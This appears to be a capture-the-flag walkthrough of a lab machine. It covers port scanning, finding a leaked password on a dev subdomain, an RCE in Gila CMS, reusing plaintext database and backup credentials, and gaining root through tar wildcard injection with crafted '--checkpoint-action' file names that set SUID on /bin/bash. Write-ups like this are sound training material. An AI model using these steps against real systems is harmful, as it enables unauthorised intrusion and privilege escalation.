CMesS - wook413

![[Pasted image 20250629160549.png]] --- # Set up Add `10.10.36.191 cmess.thm` to /etc/hosts ```bash echo "10.10.36.191 cmess.thm" | sudo tee -a /etc/hosts ``` # Information Gathering - Nmap TCP scan against all 65,535 ports found 2 open ports: 22 and 80 ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 13:45 CDT Nmap scan report for 10.10.36.191 Host is up (0.51s latency). Not shown: 56958 closed tcp ports (reset), 8575 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 27.12 seconds ``` A more detailed TCP scan against 2 ports found. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 13:46 CDT Nmap scan report for cmess.thm (10.10.36.191) Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA) | 256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA) |_ 256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Gila CMS | http-robots.txt: 3 disallowed entries |_/src/ /themes/ /lib/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds ``` UDP scan against top 1,000 ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 13:49 CDT Nmap scan report for cmess.thm (10.10.36.191) Host is up (0.14s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 965/udp closed unknown 5555/udp closed rplay 7938/udp closed unknown 20206/udp closed unknown 20742/udp closed unknown 36489/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds ``` ---- # Footprinting ##### Port 80 Navigated to `10.10.36.191` in the browser and it reveals the name of CMS it's using: Gila ![[Pasted image 20250629135238.png]] `/robots.txt` shows us 3 directories that we could explore: src, themes, and lib ![[Pasted image 20250629135309.png]] I used `gobuster` to enumerate directories and I think some could be useful by the look of some of their names ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.36.191 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index (Status: 200) [Size: 3860] /search (Status: 200) [Size: 3860] /about (Status: 200) [Size: 3359] /blog (Status: 200) [Size: 3860] /1 (Status: 200) [Size: 4090] /01 (Status: 200) [Size: 4090] /login (Status: 200) [Size: 1583] /category (Status: 200) [Size: 3871] /0 (Status: 200) [Size: 3860] /themes (Status: 301) [Size: 324] [--> http://10.10.36.191/themes/?url=themes] /feed (Status: 200) [Size: 735] /admin (Status: 200) [Size: 1583] /assets (Status: 301) [Size: 324] [--> http://10.10.36.191/assets/?url=assets] /tag (Status: 200) [Size: 3883] /author (Status: 200) [Size: 3599] /Search (Status: 200) [Size: 3860] /sites (Status: 301) [Size: 322] [--> http://10.10.36.191/sites/?url=sites] /About (Status: 200) [Size: 3345] /log (Status: 301) [Size: 318] [--> http://10.10.36.191/log/?url=log] /Index (Status: 200) [Size: 3860] /tags (Status: 200) [Size: 3145] /1x1 (Status: 200) [Size: 4090] /lib (Status: 301) [Size: 318] [--> http://10.10.36.191/lib/?url=lib] /src (Status: 301) [Size: 318] [--> http://10.10.36.191/src/?url=src] /api (Status: 200) [Size: 0] /001 (Status: 200) [Size: 4090] /cm (Status: 500) [Size: 0] /1pix (Status: 200) [Size: 4090] /fm (Status: 200) [Size: 0] /tmp (Status: 301) [Size: 318] [--> http://10.10.36.191/tmp/?url=tmp] /1a (Status: 200) [Size: 4090] /0001 (Status: 200) [Size: 4090] /1x1transparent (Status: 200) [Size: 4090] /INDEX (Status: 200) [Size: 3860] /1px (Status: 200) [Size: 4090] ``` `/login` has a login form but I haven't found any credentials yet. ![[Pasted image 20250629140310.png]] Because I felt that I hadn't gathered enough information, I tried enumerating virtual hosts and subdomains on the server. ![[Pasted image 20250629144226.png]] Added `dev.cmess.thm` to `/etc/hosts` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ echo "10.10.36.191 dev.cmess.thm" | sudo tee -a /etc/hosts [sudo] password for parallels: 10.10.36.191 dev.cmess.thm ``` `dev.cmess.thm` reveals what appears to be a chat history between andre and support and it exposes andre's new password. ![[Pasted image 20250629144623.png]] KPFTN_f2yxe% # Exploit - Gaining Initial Access I was able to login as `[email protected]` and at the very bottom, it reveals the version of Gila CMS `1.10.9` ![[Pasted image 20250629144919.png]] I searched for `gila cms` on Searchsploit and there was a known RCE vulnerability in version 1.10.9 ![[Pasted image 20250629150013.png]] ![[Pasted image 20250629150627.png]] # Lateral Movement `config.php` in `/var/www/html` contains a set of credentials that we could try in a db. ```bash <?php $GLOBALS['config'] = array ( 'db' => array ( 'host' => 'localhost', 'user' => 'root', 'pass' => 'r0otus3rpassw0rd', 'name' => 'gila', ), 'permissions' => array ( 1 => array ( 0 => 'admin', 1 => 'admin_user', 2 => 'admin_userrole', ), ), 'packages' => array ( 0 => 'blog', ), 'base' => 'http://cmess.thm/gila/', 'theme' => 'gila-blog', 'title' => 'Gila CMS', 'slogan' => 'An awesome website!', 'default-controller' => 'blog', 'timezone' => 'America/Mexico_City', 'ssl' => '', 'env' => 'pro', 'check4updates' => 1, 'language' => 'en', 'admin_email' => '[email protected]', 'rewrite' => true, );www-data@cmess:/var/www/html$ ``` `/etc/passwd` shows us there's `mysql` service account which highly indicates it's the database being used in the server and we can probably log into MySQL using the credentials we just found. ```bash www-data@cmess:/var/www/html$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false andre:x:1000:1000:andre,,,:/home/andre:/bin/bash mysql:x:108:117:MySQL Server,,,:/nonexistent:/bin/false sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin www-data@cmess:/var/www/html$ ``` I put my theory to the test and it actually worked! ```bash www-data@cmess:/var/www/html$ mysql -u root -p'r0otus3rpassw0rd' mysql: [Warning] Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 258897 Server version: 5.7.29-0ubuntu0.16.04.1 (Ubuntu) Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> ``` I enumerated databases and tables. this table named `user` stood out to me. ```bash mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | gila | | mysql | | performance_schema | | sys | +--------------------+ 5 rows in set (0.01 sec) mysql> use gila; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +----------------+ | Tables_in_gila | +----------------+ | option | | page | | post | | postcategory | | postmeta | | user | | usermeta | | userrole | | widget | +----------------+ 9 rows in set (0.00 sec) ``` `user` table contained only one user, `andre` and his username, email and hashed password. ![[Pasted image 20250629151921.png]] `hashes.com` confirmed the type of hash to be `bcrypt` ![[Pasted image 20250629152202.png]] I tried cracking the hash using both `John` and `Hashcat`, but the process was taking too long. If the hash type had been MD5, it would have been easily crackable. However, since it was bcrypt, I couldn't afford to just sit and waste my time relying solely on hash cracking tools. ```bash Session..........: hashcat Status...........: Running Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix)) Hash.Target......: $2y$10$uNAA0MEze02jd.qU9tnYLu43bNo9nujltElcWEAcifNe...4bEsBa Time.Started.....: Sun Jun 29 15:28:28 2025 (34 secs) Time.Estimated...: Wed Jul 2 02:49:54 2025 (2 days, 11 hours) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 67 H/s (8.11ms) @ Accel:4 Loops:32 Thr:1 Vec:1 Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new) Progress.........: 2256/14344385 (0.02%) Rejected.........: 0/2256 (0.00%) Restore.Point....: 2256/14344385 (0.02%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:384-416 Candidate.Engine.: Device Generator Candidates.#1....: poncho -> sprite Hardware.Mon.#1..: Util: 0% [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => ``` in the `/opt` directory, I found a hidden backup file and it included Andre's backup password. ```bash www-data@cmess:/opt$ ls -la total 12 drwxr-xr-x 2 root root 4096 Feb 6 2020 . drwxr-xr-x 22 root root 4096 Feb 6 2020 .. -rwxrwxrwx 1 root root 36 Feb 6 2020 .password.bak www-data@cmess:/opt$ cat .password.bak andres backup password UQfsdCB7aAP6 ``` I'm logged in as `andre` ```bash www-data@cmess:/opt$ su andre Password: andre@cmess:/opt$ whoami andre ``` Got the `user.txt` flag ```bash andre@cmess:~$ cat user.txt thm{c52... ``` # Privilege Escalation In the `/home/andre/backup` directory, there was a file named `note` which tells us that everything there will be backed up. This message highly indicates that there must be something that is scheduled to perform backups at a specific time. ```bash andre@cmess:~/backup$ ls note andre@cmess:~/backup$ cat note Note to self. Anything in here will be backed up! ``` Therefore, I checked `/etc/crontab` ,and as expected, there was a crontab scheduled to run every 2 minutes. It changes directory to `/home/andre/backup` and runs the following command `tar -zcf /tmp/andre_backup.tar.gz *` We see that cron job uses a wildcard (`*`) to include all files in the `/home/andre/backup` directory. This means any files placed in that directory will be processed by `tar` with root privileges. ```bash andre@cmess:~/backup$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz * ``` `Tar` has an option called `--checkpoint-action` that can execute arbitrary commands during the archiving process. By creating specially named files starting with `--checkpoint` and `--checkpoint-action`, we can trick `tar` into running malicious scripts. `shell.sh` contains a command to add the SUID bit to `/bin/bash`, you force `tar` to execute `shell.sh` as root. ```bash cd /home/andre/backup echo 'chmod +s /bin/bash' > shell.sh chmod +x shell.sh ``` creating files named `--checkpoint=1` and `--checkpoint-action=exec=sh shell.sh`. ```bash andre@cmess:~/backup$ touch -- '--checkpoint=1' andre@cmess:~/backup$ touch -- '--checkpoint-action=exec=sh shell.sh' andre@cmess:~/backup$ ls --checkpoint=1 --checkpoint-action=exec=sh shell.sh note shell.sh ``` After 2 minutes, I checked the file permissions of `/bin/bash` and it now has SUID set to it! ```bash andre@cmess:~/backup$ ls -l /bin/bash -rwsr-sr-x 1 root root 1037528 May 16 2017 /bin/bash ``` Run the binary and gain a root shell! ```bash andre@cmess:~/backup$ /bin/bash -p bash-4.3# whoami root bash-4.3# ``` Found the `root.txt` flag :) ```bash bash-4.3# cd /root bash-4.3# ls root.txt bash-4.3# cat root.txt thm{9f8... ```